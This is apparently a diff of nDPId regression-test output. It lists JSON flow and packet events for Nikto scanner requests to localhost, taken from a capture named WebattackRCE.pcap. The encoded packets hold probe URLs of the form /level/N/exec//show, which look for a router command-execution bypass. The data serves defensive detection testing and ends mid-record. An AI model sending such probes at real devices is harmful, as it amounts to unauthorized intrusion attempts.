00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":1,"flow_last_seen":1576420277611,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277611,"pkt":"AAAAAAAAAAAAAAAACABFAADIEPFAAEAGKz1\/AAABfwAAAcYmH5CKoygWHO02yYAYAED+vAAAAQEICp1m\/pOdZv6TR0VUIC9sZXZlbC8zNC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277611,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/34\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001281)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277611,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/34\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001281)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277612,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":1,"flow_last_seen":1576420277612,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277612,"pkt":"AAAAAAAAAAAAAAAACABFAADILGdAAEAGD8d\/AAABfwAAAcYoH5DpvhSfS8jZeYAYAED+vAAAAQEICp1m\/pSdZv6UR0VUIC9sZXZlbC8zNS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODIpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277612,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/35\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001282)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277612,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/35\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001282)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277614,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":1,"flow_last_seen":1576420277614,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277614,"pkt":"AAAAAAAAAAAAAAAACABFAADIgnNAAEAGubp\/AAABfwAAAcYqH5AJ3LqL6hJPloAYAED+vAAAAQEICp1m\/pWdZv6VR0VUIC9sZXZlbC8zNi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277614,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/36\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001283)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277614,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/36\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001283)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":1,"flow_last_seen":1576420277615,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277615,"pkt":"AAAAAAAAAAAAAAAACABFAADIj29AAEAGrL5\/AAABfwAAAcYsH5DrNbeX8ap25oAYAED+vAAAAQEICp1m\/pedZv6XR0VUIC9sZXZlbC8zNy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjg0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/37\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001284)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/37\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001284)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277616,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":1,"flow_last_seen":1576420277616,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277616,"pkt":"AAAAAAAAAAAAAAAACABFAADImrpAAEAGoXN\/AAABfwAAAcYuH5CDY6JF2zT1KYAYAED+vAAAAQEICp1m\/pidZv6YR0VUIC9sZXZlbC8zOC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277616,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/38\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001285)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277616,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/38\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001285)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277618,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":1,"flow_last_seen":1576420277618,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277618,"pkt":"AAAAAAAAAAAAAAAACABFAADIUbFAAEAG6nx\/AAABfwAAAcYwH5C3PmlUu95eg4AYAED+vAAAAQEICp1m\/pqdZv6aR0VUIC9sZXZlbC8zOS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277618,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/39\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001286)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277618,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/39\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001286)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277619,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":1,"flow_last_seen":1576420277619,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277619,"pkt":"AAAAAAAAAAAAAAAACABFAADI5L9AAEAGV25\/AAABfwAAAcYyH5D7t9xCdJSM64AYAED+vAAAAQEICp1m\/pudZv6bR0VUIC9sZXZlbC80MC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjg3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277619,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/40\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001287)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277619,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/40\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001287)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277622,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":1,"flow_last_seen":1576420277622,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277622,"pkt":"AAAAAAAAAAAAAAAACABFAADIjX9AAEAGrq5\/AAABfwAAAcY0H5DiALWBzWdeg4AYAED+vAAAAQEICp1m\/p6dZv6eR0VUIC9sZXZlbC80MS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODgpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277622,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/41\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001288)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277622,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 